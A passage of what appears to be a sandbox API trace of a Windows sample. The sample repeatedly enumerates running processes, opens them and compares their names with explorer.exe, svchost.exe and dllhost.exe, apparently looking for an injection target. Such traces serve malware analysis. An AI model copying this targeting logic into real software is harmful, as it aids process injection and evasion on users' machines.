hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.823] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0220.823] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0220.823] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0220.823] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0220.823] CloseHandle (hObject=0xd8) returned 1 [0220.823] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0220.824] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0220.824] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0220.824] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0220.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0220.824] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0220.825] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0220.825] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0220.825] CloseHandle (hObject=0xd8) returned 1 [0220.825] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0220.825] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0220.825] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0220.825] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.825] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0220.825] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0220.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0220.826] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0220.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0220.826] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0220.826] CloseHandle (hObject=0xd8) returned 1 [0220.826] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0220.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0220.827] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0220.827] CloseHandle (hObject=0xd8) returned 1 [0220.827] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0220.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0220.828] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0220.828] CloseHandle (hObject=0xd8) returned 1 [0220.828] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0220.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0220.828] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0220.828] CloseHandle (hObject=0xd8) returned 1 [0220.828] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0220.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0220.831] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0220.831] CloseHandle (hObject=0xd8) returned 1 [0220.831] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0220.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0220.832] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0220.832] CloseHandle (hObject=0xd8) returned 1 [0220.832] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0220.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0220.833] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0220.833] CloseHandle (hObject=0xd8) returned 1 [0220.833] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0220.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0220.833] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0220.833] CloseHandle (hObject=0xd8) returned 1 [0220.833] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0220.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0220.834] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0220.834] CloseHandle (hObject=0xd8) returned 1 [0220.834] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0220.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0220.834] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0220.834] CloseHandle (hObject=0xd8) returned 1 [0220.834] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0220.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0220.835] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0220.835] CloseHandle (hObject=0xd8) returned 1 [0220.835] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0220.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0220.836] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0220.836] CloseHandle (hObject=0xd8) returned 1 [0220.836] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0220.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0220.836] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0220.836] CloseHandle (hObject=0xd8) returned 1 [0220.836] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0220.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0220.837] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0220.837] CloseHandle (hObject=0xd8) returned 1 [0220.837] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0220.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0220.837] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0220.837] CloseHandle (hObject=0xd8) returned 1 [0220.837] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0220.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0220.838] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0220.838] CloseHandle (hObject=0xd8) returned 1 [0220.838] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0220.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0220.839] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0220.839] CloseHandle (hObject=0xd8) returned 1 [0220.839] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0220.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0220.839] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0220.839] CloseHandle (hObject=0xd8) returned 1 [0220.839] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0220.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0220.840] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0220.840] CloseHandle (hObject=0xd8) returned 1 [0220.840] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0220.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0220.840] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0220.840] CloseHandle (hObject=0xd8) returned 1 [0220.840] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0220.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0220.841] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0220.841] CloseHandle (hObject=0xd8) returned 1 [0220.841] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0220.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0220.842] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.842] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0220.842] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0220.843] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0220.843] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.843] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0220.843] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0220.844] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0220.844] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0220.844] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0220.844] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0220.844] CloseHandle (hObject=0xd8) returned 1 [0220.844] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0220.844] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0220.845] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0220.845] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0220.845] CloseHandle (hObject=0xd8) returned 1 [0220.845] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0220.845] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0220.845] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0220.845] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0220.845] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0220.845] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0220.846] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0220.846] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0220.846] CloseHandle (hObject=0xd8) returned 1 [0220.846] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0220.846] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0220.847] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0220.847] CloseHandle (hObject=0xd8) returned 1 [0220.847] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0220.847] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0220.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0220.889] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0220.889] CloseHandle (hObject=0xd8) returned 1 [0220.889] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0220.890] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0220.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xd8 [0220.890] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0220.890] CloseHandle (hObject=0xd8) returned 1 [0220.890] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0220.891] CloseHandle (hObject=0xd4) returned 1 [0220.891] Sleep (dwMilliseconds=0x3e8) [0221.905] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0221.908] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0221.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0221.908] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0221.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0221.909] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0221.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0221.909] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0221.910] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0221.910] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0221.912] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0221.912] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0221.913] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0221.913] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0221.913] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0221.913] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0221.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0221.914] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0221.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0221.914] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0221.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0221.915] Process32Next 